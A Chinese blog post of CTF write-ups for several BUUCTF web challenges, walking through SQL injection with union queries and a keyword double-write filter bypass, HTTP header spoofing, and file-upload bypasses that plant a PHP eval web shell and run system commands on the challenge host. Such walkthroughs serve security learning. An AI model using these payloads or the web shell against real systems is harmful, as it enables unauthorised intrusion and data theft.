BUUCTFweb的一些wp(2)

最新推荐文章于 2023-08-10 12:59:46 发布
最新推荐文章于 2023-08-10 12:59:46 发布
阅读量442 收藏
点赞数
分类专栏: BUUCTF CTF 文章标签: sql mysql 安全 web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44371274/article/details/128258209
版权

[极客大挑战 2019]Knife

很明显,它直接提示我们菜刀了,直接用菜刀连一下就好了

在这里插入图片描述在这里插入图片描述然后在根目录下找到flag

在这里插入图片描述在这里插入图片描述

[极客大挑战 2019]LoveSQL

啊很明显的SQL注入,尝试下万能密码

1' or 1=1 #

在这里插入图片描述发现它给了用户名admin和密码,这个密码有点像16进制加密,尝试解密,但是没啥用
在这里插入图片描述于是我们继续思路,尝试order by看一下有多少列,发现只有3列

在这里插入图片描述确定有3列后,我们来测试下回显字段的位置

1' union select 1,2,3#

在这里插入图片描述可以看到2,3都可以作为回显,随便选一个就好,接下来我们来爆一下数据库名

1‘ union select 1,database(),3 #

在这里插入图片描述ok,这里我们知道了数据库为geek,接下来爆表

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'geek' #

在这里插入图片描述可以看到有两个表,显然geekuser不是我们的目标,于是我们尝试爆后面这个奇奇怪怪的表(一般爆这种奇奇怪怪的准没错,就算出错再爆那个规规矩矩的嘛)

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'geek' and table_name = 'l0ve1ysq1' #

在这里插入图片描述然后我们可以看到有id,username,password,ok,最后获取这三个字段就行啦

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #

在这里插入图片描述这里要往右边多拉一会,因为作者载着理发店…

[极客大挑战 2019]Http

打开这个题,发现网页是很健康的绿色,然后左看看右看看上看看下看看发现啥都没有,打开源码康一下,果然有个Secret.php

在这里插入图片描述那就打开看看呗

在这里插入图片描述它说需要从这个地址访问,结合题目描述,懂了,抓包!

在这里插入图片描述我们添加一个

referer:https://Sycsecret.buuoj.cn

在这里插入图片描述然后他让我们用Syclover这个浏览器,我们再修改User-agent,把我们的浏览器换成它的

在这里插入图片描述然后它又说只能在本地访问,那我们再加一个

x-forwarded-for:127.0.0.1

在这里插入图片描述这下总算拿到flag了

[极客大挑战 2019]Upload

upload,直接告诉我们是文件上传了,那就抓包!上传!

在这里插入图片描述

啊,它提示我们没有图像,那就修改一下Content-Type,改成

image/jpeg

在这里插入图片描述提示我们这是php,哒咩!okok,那我们改个后缀,把php改成phtml试试

在这里插入图片描述ok,现在告诉我们不能有<?,那我们换一种🐎

<script language="php">eval($_GET['hack']);</script>

在这里插入图片描述这次它告诉我们这还不是图片,我们在🐎前面加上GIF89a来进行图像头文件欺骗

在这里插入图片描述这下ok了,我们直接刀它就可以拿到flag了
这里我遇到了一个问题,刀不好使了,发现没有返回数据,那除了刀,我们还可以自己来拿,只要切换到我们的🐎目录下,利用🐎来执行系统函数也是可以的,比如我这里是

http://67bcff20-d185-4419-841a-c8dd12ce712b.node4.buuoj.cn:81/upload/1.phtml?hack=system(%27ls%20/%27);

在这里插入图片描述
可以看到flag就在根目录下,于是我们直接cat /flag

http://67bcff20-d185-4419-841a-c8dd12ce712b.node4.buuoj.cn:81/upload/1.phtml?hack=system(%27cat%20/flag%27);

在这里插入图片描述

[ACTF2020 新生赛]Upload

又是一个文件上传题,直接抓包看看

在这里插入图片描述发现它前端直接就不让我们传非图片的文件,那简单,我们先改成图片形式的,然后再抓包改回来就好了

在这里插入图片描述哎,php被发现了,改成phtml试试

在这里插入图片描述ok,成啦,按照这个路径去刀就行,要是刀不上,就自己控制拿flag

[极客大挑战 2019]BabySQL

和之前一个系列的,老套路,先试试万能密码,发现不行,注意到提示说有过滤,这里我们可以小小的fuzz一下,看看过滤了些什么,经过fuzz发现or,and,select,from,union,where等都被过滤了,那么,有没有可能双写绕过呢,试一试

1' oorr 1=1 #

在这里插入图片描述发现成功绕过了,ok,那接下来也基本上和上面那道题一样了,但是这里需要注意双写,我把注入过程的语句贴在下面

1' ununionion seselectlect 1,2,database() #

1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema = 'geek' #

1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' anandd table_name = 'b4bsql'#

1' ununionion seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#

然后就拿到flag啦

Purger
关注
专栏目录
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)
qq_43710889的博客
11-27 4119
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善) 文章目录[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[ACTF2020 新生赛]Include[强网杯 2019]随便注 [HCTF 2018]WarmUp 首先看看网页源码呗 <?php highlight_file(__FILE__); class emmm {
WP2PDF-开源
05-15
WP2PDF是一个脚本,可将Blog-Software WordPress的一个或多个条目的内容转换为PDF。 它基于FPDF(一个免费的PDF库,用PHP编写)。 它需要可正常运行的WordPress安装和PHP4.x。
buuctf web wp
qq_63267612的博客
04-10 579
文章目录[极客大挑战 2019]EasySQL [极客大挑战 2019]EasySQL 打开后是一个登录框,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
BUUCTF web wp(一)
m0_55854679的博客
06-14 420
[HCTF 2018]WarmUp 打开题目链接,右键点击查看源码,发现source.php 访问source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.p
BUUCTF web部分WP
Fab1an的博客
06-08 413
首先,你需要找到两个不同的字符串,它们的 MD5 哈希值相同,这可以通过哈希碰撞来实现。F12审查元素,或者ctrl + shift + c 审查元素,发现一段关于php的注释,内容为GET传参,如果cat等于dog的话,就echo打印什么东西。我们根据Linux的特性,用 ../../../../../很多个../去到根目录,然后打开ffffllllaaaagggg,就可以获得flag。数组的md5都是Null,所以它们满足MD5相等的条件。然后id的数组是1,gg的数组是2,满足值不相等的条件。
buuctf-web作业wp
qq_46266956的博客
03-05 1638
1x01题目-[HCTF 2018]WarmUp 知识点: php代码审计--php的基础知识 总结: 对字符串处理的一些函数: empty(),判断是否空 is_string(),判断是否为字符串 urldecode(),进行url解码 in_array(), mb_substr(),针对中文的字符串分割 mb_strpos(),针对中文的字符串出现的位置 1x02题目-[极客大挑战 2019]Havefun 知识点: 无—超级简单的php代码审计吧算 解题: 百年一遇的简单题(看能不能抓住机会了,
亲测-wordpress文章实时同步发布修改删除多个站点的WP2WP插件
最新发布
05-12
标题中的“wordpress文章实时同步发布修改删除多个站点的WP2WP插件”指的是WordPress平台上的一个插件,名为WP2WP。这个插件的主要功能是实现多站点间的文章内容同步,确保用户在任意一个WordPress站点上发布、更新...
wp2pcs百度网盘
01-10
wP2PCS把你的WordPress和百度个人云存储(百度网盘)联系在一起,将百度网盘作为你的网站后备箱,你可以将WordPress备份到百度云,可以把图片放在百度云,可以利用百度云为你的网站提供下载,利用云存储随时随地同步...
wp-api-multiple-posttype:wordpress wp rest api wpv2posts api的v2扩展,以允许查询多种帖子类型
02-05
wp / v2 / posts api的扩展允许查询多种帖子类型 关于 想获取您网站的帖子,页面,文章,事件吗? 使用端点:“ / wp-json / wp / v2 / multiple-post-type” 清单: GET请求到/wp-json/wp/v2/multiple-post-...
wp7--.rar_WP7_wp889.com::_wp889com_wp932_位置服务
09-23
WP7位置服务应用开发详解》 在移动设备领域,Windows Phone 7(简称WP7)是由微软公司推出的一款操作系统,它为开发者提供了一个强大的平台来构建创新的应用程序。其中,位置服务是WP7应用程序中的一项重要功能,...
buuctf web题的wp
qq_51439282的博客
11-25 582
首先看到buuctf里的 [HCTF 2018]WarmUp 可以发现这道题是关于PHP和代码审计的,好家伙我都不会,有得我学了。 打开链接可以看到一张滑稽脸 那不就直接F12,打开查看器 经过我的仔细观察发现没啥可用的东西,到后面开了题解才发现,oh~,原来要查看这个source.php的源代码(其实前面都说了这道题是关于php和代码审计的,我居然没反应过来) 好家伙,就算知道了这个思路,我也不知道怎么查看这个php的源代码,经过一番查找,才发现我们只需要将它复制下来,然后在我们这个web题的链接后面加
BUUCTFweb的一些wp(1)
qq_44371274的博客
12-08 647
BUUCTFwp
BUUCTFweb的一些wp(3)
qq_44371274的博客
12-12 199
BUUCTFwp
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 5615
BUUCTF--Web篇详细wp
BUUCTF web wp
vegetable223的博客
11-28 425
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
Buuctf -web wp汇总(一)
Alexhirchi的博客
05-07 6475
BuuCTF平台 [极客大挑战 2019]EasySQL1 访问,一个登陆界面 尝试随意登录,提示账号和密码错误 构造点在url,账号密码再url中,尝试构造恶意SQL语句,发现是最基本的报错型注入,无过滤。典型的’ # 闭合,先判断出3列,再用联合查询 'select 1,2,3 %23 直接获得了flag。利用万能密码也可以获得flag [极客大挑战 2019]LoveSQL1 访问,是一个登...
BUUCTF-部分WebWP
lqyzkn的博客
10-04 801
[HCTF 2018]WarmUp PHP 代码审计 WP: 拿到题目查看源码,发现一个文件 打开后得到如下源码: 按照提示访问hint.php文件,得到提示: 猜想flag在ffffllllaaaagggg文件里,然后进行php代码审计,发现flag可能包含在file文件夹里了,经过多次尝试目录穿越,得到flag: 当然,这里用hint.php也行。 [极客大挑战 2019]Havefun WP: 打开网址查看源码: 看见一段被注释掉的PHP代码。代码提示,如果请求page?cat=xxx,在
BUUCTF题目Web部分wp(持续更新)
苦行僧的妖孽日常
08-10 1312
BUUCTF题目Web部分的writeup(持续更新)
BUUCTF webwp(四)
m0_55854679的博客
07-28 308
[极客大挑战 2019]Knife 直接使用蚁剑连接即可得到flag。 [极客大挑战 2019]Http 题目给了一个链接,在新网页打开这个链接为三叶草安全技术小组的广告页。pic_center) 查看网页源码,发现了 onclick="return false" href="Secret.php", 访问Secret.php这个页面 提示访问来源不对,此时我们可以通过Referer头来伪造链接来源。 在Secret.php页面使用burp抓包,添加一行 referer:https://www.Sycse
HD2刷机教程:直入WP7系统的详细步骤
2. 闪存WP7 OS包:使用DWI (DFT Windows Installer) 工具来安装WP7系统镜像。 完成刷机后,手机启动速度较快,大约20秒内可以进入设置界面。此外,刷入WP7系统后的手机表现良好: - 充电功能正常,电池续航表现正常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Purger

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值